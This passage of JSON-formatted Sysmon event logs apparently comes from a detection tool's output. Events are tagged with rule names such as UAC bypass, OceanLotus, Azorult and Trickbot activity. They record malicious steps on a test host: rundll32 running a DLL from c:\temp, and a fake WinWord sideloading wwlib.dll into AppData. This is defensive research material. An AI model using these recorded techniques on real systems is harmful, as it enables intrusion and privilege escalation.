21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424246,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930392Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD 
(0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424247,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.930441Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424248,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931190Z"}},"Version":2}}}},{"detection":["OceanLotus Registry 
Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424249,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931290Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 
21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424250,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931385Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424251,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:21.931451Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary 
Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424260,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.063160Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 
21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424262,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.074619Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424320,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.361291Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 
21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\data.enc","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424322,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.364651Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\config.xml","UtcTime":"2020-10-23 21:58:22.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424323,"Execution":{"#attributes":{"ProcessID":3208,"ThreadID":4804}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-23T21:58:22.391794Z"}},"Version":2}}}},{"detection":["Trickbot Malware 
Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\wermgr.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Problem Reporting","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=231052FA4311FA3501539E34E21A624921E3C270,MD5=CD042F94B63D67E012CFB4297D313248,SHA256=61A84B2D8CA05C11E79DB8E18FEB0FE4BE1B8D555D0BE2651516B144800153AB,IMPHASH=4E00FCA0721761B10A8A7351CEFB0596","Image":"C:\\Windows\\System32\\wermgr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6311-5F8F-0000-0020E0100900","LogonId":"0x910e0","OriginalFileName":"WerMgr","ParentCommandLine":"rundll32.exe c:\\temp\\winfire.dll,DllRegisterServer","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-659B-5F8F-0000-001026C33300","ParentProcessId":2372,"ProcessGuid":"747F3D96-659E-5F8F-0000-001064E03300","ProcessId":5600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-20 22:33:02.059"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":422695,"Execution":{"#attributes":{"ProcessID":3408,"ThreadID":4448}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-20T22:33:02.063979Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Users\\Public\\tools\\apt\\wwlib\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020100A0A00","LogonId":"0xa0a10","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-CA8F-5F8A-0000-001025020B00","ParentProcessId":5104,"ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:27.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417068,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:27.499490Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417069,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4704}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:28.429353Z"}},"Version":3}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8DF-5F8A-0000-0010572F7200","ProcessId":3660,"Product":"?","RuleName":"","Signature":"주식회사 
엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:27.769"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417070,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4704}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:28.429717Z"}},"Version":3}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Office Word","FileVersion":"12.0.4518.1014","Hashes":"SHA1=534A7EA9C67BAB3E8F2D41977BF43D41DFE951CF,MD5=CEAA5817A65E914AA178B28F12359A46,SHA256=6C959CFB001FBB900958441DFD8B262FB33E052342948BAB338775D3E83EF7F7,IMPHASH=46337557842A2A62735BB11EB096B204","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"WinWord.exe","ParentCommandLine":"C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}","ParentImage":"C:\\Windows\\SysWOW64\\dllhost.exe","ParentProcessGuid":"747F3D96-D8E2-5F8A-0000-0010F28A7200","ParentProcessId":8500,"ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"2007 Microsoft Office system","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 
11:43:31.478"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417071,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:31.484036Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417072,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:31.627786Z"}},"Version":3}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 
Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=6F32C711AFA423DF203AE2A27B259299402CF317,MD5=F0FCD453346038E434FA2D9F1E769F5B,SHA256=DB07BB76B9B227A54092179F4DCB3DFC25B325887E01098125AC44FDA70104E6,IMPHASH=22B6C0416D4E9B8FF922CC11DE30ADE7","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ImageLoaded":"C:\\Users\\Public\\tools\\apt\\wwlib\\wwlib.dll","OriginalFileName":"?","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"Product":"?","RuleName":"","Signature":"주식회사 엘리시온랩","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-10-17 11:43:31.615"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":417073,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:31.628328Z"}},"Version":3}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","UtcTime":"2020-10-17 
11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417074,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:33.449476Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-10-17 10:48:12.936","Image":"C:\\Users\\Public\\tools\\apt\\wwlib\\test.exe","ProcessGuid":"747F3D96-D8E3-5F8A-0000-001029A37200","ProcessId":1256,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll","UtcTime":"2020-10-17 11:43:33.444"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":417075,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:33.476471Z"}},"Version":2}}}},{"detection":["MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows 
Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8E8-5F8A-0000-00102CEF7200","ProcessId":840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:36.303"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417079,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:36.306601Z"}},"Version":5}}}},{"detection":["MS Office Product Spawning Exe in User Dir"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\explorer.exe\"","Company":"Microsoft 
